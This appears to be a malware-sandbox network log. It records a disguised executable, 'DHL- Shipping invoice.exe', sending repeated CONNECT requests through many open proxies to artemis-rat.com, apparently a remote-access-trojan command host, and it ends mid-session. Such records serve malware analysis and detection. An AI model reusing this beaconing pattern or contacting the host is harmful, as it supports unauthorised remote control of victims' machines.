                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            738192.168.2.452276198.57.211.235110966484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.841082096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.447418928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.343760967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.046988010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.204744101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.453314066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.639775991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.947632074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.640433073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            739192.168.2.44984198.64.169.1780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.841161013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.875744104 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            740192.168.2.45227365.1.244.23210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.873374939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.147407055 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            741192.168.2.452459172.64.86.217806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.876153946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.963249922 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            742192.168.2.452474104.20.235.179806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.876302004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.964623928 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            743192.168.2.452197154.85.58.149806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.876529932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.756237984 CET321INHTTP/1.1 400 Bad Request
                            Server: openresty/1.15.8.2
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 163
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.15.8.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            744192.168.2.452478104.16.108.42806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.876936913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.964272976 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            745192.168.2.452480162.159.241.160806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.877777100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.965701103 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            746192.168.2.45244566.225.246.23880806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.881639957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            747192.168.2.452186102.132.54.3480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.881891012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            748192.168.2.45246738.162.3.13131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.883811951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.182393074 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            749192.168.2.4522458.218.100.12080806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.884108067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.006700993 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.24.0
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            750192.168.2.452503172.67.162.127806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.884382963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.971837997 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            751192.168.2.4524348.211.4.215806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.884531975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.218202114 CET503INHTTP/1.1 400 Bad Request
                            Content-Type: text/html; charset=us-ascii
                            Server: Microsoft-HTTPAPI/2.0
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Connection: close
                            Content-Length: 324
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            752192.168.2.45247238.162.14.17131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.884720087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.191720009 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            753192.168.2.452408207.180.198.241573276484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.884933949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            754192.168.2.452406185.162.60.680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.886152983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            755192.168.2.45218352.172.1.18631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.886223078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.476198912 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            756192.168.2.452248194.44.208.62806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.886224031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            757192.168.2.452235102.132.53.15080806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.888189077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            758192.168.2.45229893.171.220.22988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.890007973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            759192.168.2.45215358.18.43.34108006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.890252113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            760192.168.2.45244495.43.244.1541536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.891464949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            761192.168.2.452251103.234.27.15310806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.891892910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            762192.168.2.452589172.67.14.237806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.891971111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.981626034 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            763192.168.2.45225845.133.168.8280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.892544031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            764192.168.2.45246672.195.34.35273606484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.892767906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            765192.168.2.452278115.127.31.6680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.893249035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
